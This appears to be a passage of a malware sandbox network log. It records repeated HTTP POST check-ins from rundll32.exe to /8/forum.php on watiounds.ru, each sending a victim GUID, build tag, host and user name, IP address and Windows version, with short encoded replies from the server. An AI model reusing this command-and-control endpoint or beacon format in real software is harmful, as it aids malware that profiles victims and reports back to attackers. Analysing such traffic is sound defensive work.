                                          Apr 29, 2021 08:22:23.337340117 CEST | 182 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:23.465610981 CEST | 182 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZJQAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          132 | 192.168.2.22 | 49297 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:23.790137053 CEST | 183 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:23.913871050 CEST | 183 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNMNMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          133 | 192.168.2.22 | 49298 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:24.228878975 CEST | 184 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:24.354186058 CEST | 184 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQZAJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          134 | 192.168.2.22 | 49299 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:24.673321009 CEST | 185 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:24.797720909 CEST | 185 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTCXGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          135 | 192.168.2.22 | 49300 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:25.116193056 CEST | 186 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:25.238400936 CEST | 186 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQVEJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          136 | 192.168.2.22 | 49301 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:25.561485052 CEST | 187 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:25.692095995 CEST | 188 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZVEAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          137 | 192.168.2.22 | 49302 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:26.013267040 CEST | 188 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:26.146719933 CEST | 189 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:26 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 47 54 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQGTJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          138 | 192.168.2.22 | 49303 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:26.465742111 CEST | 189 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:26.588289976 CEST | 190 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:26 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 54 47 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYTGBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          139 | 192.168.2.22 | 49304 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:26.914062977 CEST | 191 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:27.045412064 CEST | 191 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 43 58 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYCXBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          14 | 192.168.2.22 | 49179 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:19:47.252847910 CEST | 39 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:19:47.381026983 CEST | 40 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:19:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 47 54 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKGTPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          140 | 192.168.2.22 | 49305 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:27.368114948 CEST | 192 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:27.497481108 CEST | 192 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cACXZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          141 | 192.168.2.22 | 49306 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:27.818994045 CEST | 193 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:27.949532032 CEST | 193 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 48 53 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMHSNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          142 | 192.168.2.22 | 49307 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:28.266843081 CEST | 194 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:28.388788939 CEST | 194 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFGTUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          143 | 192.168.2.22 | 49308 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:28.707127094 CEST | 195 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:28.831115961 CEST | 195 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 46 55 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNFUMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          144 | 192.168.2.22 | 49309 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:29.152132034 CEST | 196 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:29.278121948 CEST | 196 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVKPEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          145 | 192.168.2.22 | 49310 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:29.592197895 CEST | 197 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:29.723362923 CEST | 198 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4a 51 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCJQXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          146 | 192.168.2.22 | 49311 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:30.049376011 CEST | 198 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:30.178198099 CEST | 199 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTCXGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          147 | 192.168.2.22 | 49312 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:30.512536049 CEST | 200 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:30.642143965 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 54 47 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKTGPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          148 | 192.168.2.22 | 49313 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:31.008846045 CEST | 201 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:31.131063938 CEST | 201 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMKPNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          149 | 192.168.2.22 | 49314 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:31.514576912 CEST | 202 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:31.645745993 CEST | 202 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 54 47 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGTGTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          15 | 192.168.2.22 | 49180 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:20:02.548259974 CEST | 42 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:20:02.672324896 CEST | 43 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:20:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 51 4a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYQJBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          150 | 192.168.2.22 | 49315 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:31.971333981 CEST | 203 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
